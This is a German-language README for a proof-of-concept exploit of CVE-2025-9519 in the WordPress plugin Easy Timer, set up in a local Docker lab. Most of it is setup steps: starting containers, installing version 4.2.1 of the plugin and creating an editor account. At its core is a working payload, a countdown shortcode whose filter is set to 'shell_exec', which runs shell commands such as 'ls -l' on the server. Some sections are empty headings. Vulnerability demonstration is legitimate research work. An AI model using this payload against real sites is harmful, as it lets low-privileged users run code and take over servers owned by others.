
Proof-of-Concept-Exploit für CVE-2025-9519, das Remote-Code-Ausführung im WordPress-Plugin Easy Timer über einen manipulierten Shortcode-Filter demonstriert, mit Docker-basierter Einrichtung.
Siehe die offizielle Docker-Dokumentation für die Installation: Docker Engine Install
Führen Sie aus Ihrem Projektverzeichnis aus:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/WordPress-Dashboard → Plugins → und klicken Sie auf .
Easy TimerAktivieren
Führen Sie aus Ihrem Projektverzeichnis den folgenden Befehl aus:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(Hinweis: Ersetzen Sie dies durch Ihren gewünschten Benutzernamen, Ihre E-Mail-Adresse und Ihr Passwort!)
Beiträge → Neuen Beitrag hinzufügenShortcode-Block ein und geben Sie Folgendes ein:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Hinweis: Stellen Sie sicher, dass Sie einen Shortcode-Block verwenden, keinen Absatz-Block, damit der Shortcode korrekt gerendert wird.

Glückwunsch, Sie haben RCE.

sudo docker ps
Sie sollten in etwa Folgendes sehen:

Wenn Shortcodes nicht gerendert werden:
Wenn die Navigation zu http://localhost:8000/ die Meldung Datenbank nicht verbunden anzeigt: